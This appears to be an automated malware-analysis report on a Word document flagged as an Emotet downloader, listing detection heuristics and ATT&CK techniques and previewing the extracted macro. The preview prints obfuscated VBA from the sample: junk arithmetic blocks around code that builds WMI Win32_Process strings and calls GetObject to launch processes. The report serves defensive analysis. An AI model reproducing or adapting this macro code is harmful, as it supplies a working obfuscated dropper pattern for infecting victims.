MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature Doc.Downloader.Emotet-6865929-0, indicating it is likely part of the Emotet botnet. High-severity heuristics confirm the presence of an AutoOpen VBA macro that uses GetObject, a common technique for executing downloaded payloads. The VBA macro itself is heavily obfuscated, but its presence and the associated heuristics strongly suggest it functions as a downloader.
Heuristics 7
-
ClamAV: Doc.Downloader.Emotet-6865929-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6865929-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 45725 bytes |
SHA-256: 672bcda4744b52134b33701ae10b2cfe06fb4c4f5c4a3345daabfe1a0e0cc597 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "I2_8_5_"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "u0_48_06"
Function N3_565_()
Select Case b863__
Case 431371279
V9_8_06 = (Q_96_7_ * Fix(695364989 / CBool(p_9042))) - W__36__ / Oct(382656033) / 780021985 + CStr(m092_0_8) - 113772300 + ChrB(Y59289__)
End Select
Select Case z71_6097
Case 669341825
J5914_ = (w52529_3 * Fix(176847092 / CBool(d4351345))) - i38_0_ / Oct(188194310) / 239570012 + CStr(z5269_3_) - 362754786 + ChrB(X6__1__)
End Select
Select Case G__377_8
Case 121105805
v_5621 = (c7____3 * Fix(824173582 / CBool(r_60_50))) - G_51633 / Oct(232067655) / 498670588 + CStr(z6_668) - 327112891 + ChrB(T59__5)
End Select
Select Case f5__8_6
Case 642986296
j_81490 = (v8333__7 * Fix(556817151 / CBool(z7928_))) - D5_51528 / Oct(45697134) / 74204509 + CStr(d4___6) - 138267955 + ChrB(f6___8)
End Select
Select Case R_98_1
Case 42792980
Y_064_66 = (j5_5_443 * Fix(367194489 / CBool(c___6_4))) - X23530 / Oct(29872258) / 695302326 + CStr(l0538_68) - 748963951 + ChrB(s096_1_)
End Select
Select Case m96319
Case 436332751
S7_6_22 = (q019398 * Fix(647319227 / CBool(Z01__2))) - t_49_1 / Oct(281085154) / 399938037 + CStr(z_86__3) - 194116409 + ChrB(W_0656)
End Select
Select Case w_6___2
Case 162669992
p66__3 = (v9_2__ * Fix(39925566 / CBool(B5_45_))) - G2__4289 / Oct(404211611) / 188272198 + CStr(Q_6616) - 911824840 + ChrB(D6___2_6)
End Select
Select Case k4044_5
Case 138753808
s60_037 = (v__6_4 * Fix(13603534 / CBool(w01970__))) - V941_5 / Oct(171727410) / 920107485 + CStr(z13_81) - 778154580 + ChrB(w_425405)
End Select
End Function
Function A757807_(d600__, p_62990_)
On Error Resume Next
Select Case q______
Case 293156284
I7_1606 = (G84593 * Fix(254758058 / CBool(r2__794))) - W610084_ / Oct(905500414) / 148892734 + CStr(b08_1_8) - 617363153 + ChrB(i167193)
End Select
Select Case J33303
Case 450992557
Q919__8 = (r0_734_2 * Fix(912080825 / CBool(T3086877))) - j10142 / Oct(400426436) / 523397957 + CStr(X__496_) - 961862349 + ChrB(d4_3_2)
End Select
Select Case n9847_
Case 573864838
n806_284 = (w5_5__77 * Fix(790184506 / CBool(J20_6851))) - o20577_ / Oct(215529556) / 666706755 + CStr(q2_1_496) - 989427722 + ChrB(w_97_978)
End Select
f12_6_ = Z334_7 + "winmgmts:Win32" + O2_161_ + "_ProcessStartup" + N_042_3
Select Case T__2___
Case 514677828
j23___ = (I5_327 * Fix(811811049 / CBool(o38883_2))) - F776846_ / Oct(240581321) / 428907187 + CStr(P4439649) - 383418898 + ChrB(v16891)
End Select
Select Case w9__52
Case 530342176
t942__ = (d__68672 * Fix(15976114 / CBool(i774__))) - R_6530 / Oct(176904541) / 47390928 + CStr(D_3_8__) - 475112187 + ChrB(L505749)
End Select
Select Case u___047
Case 842586388
j45706 = (C_1_4__ * Fix(246513483 / CBool(z_0_6_92))) - D2012__ / Oct(353346520) / 368221823 + CStr(h627762) - 571966315 + ChrB(V28_460_)
End Select
U996553_ = O2_06_3 + "winmgmts:Win32" + k5529__2 + "_Process" + m87402_3
Select Case Y48__1__
Case 703101196
a_5148 = (w54_29 * Fix(361334800 / CBool(b_2_8128))) - N30_71_ / Oct(877285188) / 864355579 + CStr(i_33594) - 380435095 + ChrB(f7_7_2)
End Select
Select Case O013623_
Case 13408787
W_53329 = (d57771 * Fix(550108056 / CBool(h978263))) - D_5075__ / Oct(827837634) / 986804500 + CStr(i85_3_) - 210736181 + ChrB(S8_965__)
End Select
Select Case Z26__14_
Case 776571958
Z379_724 = (Q_4296__ * Fix(706111859 / CBool(f3953_))) - u65_1__7 / Oct(94193393) / 554993537 + CStr(d12333) - 751127162 + ChrB(S114__1)
End Select
Set v_31__6 = GetObject(L7_13257 + f12_6_ + N0757_3_)
Select Case I8780_8
Case 597217472
B9_3_0_ = (I8_3_1_9 * Fix(975848075 / CBool(D__8419))) - N10500 / O
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.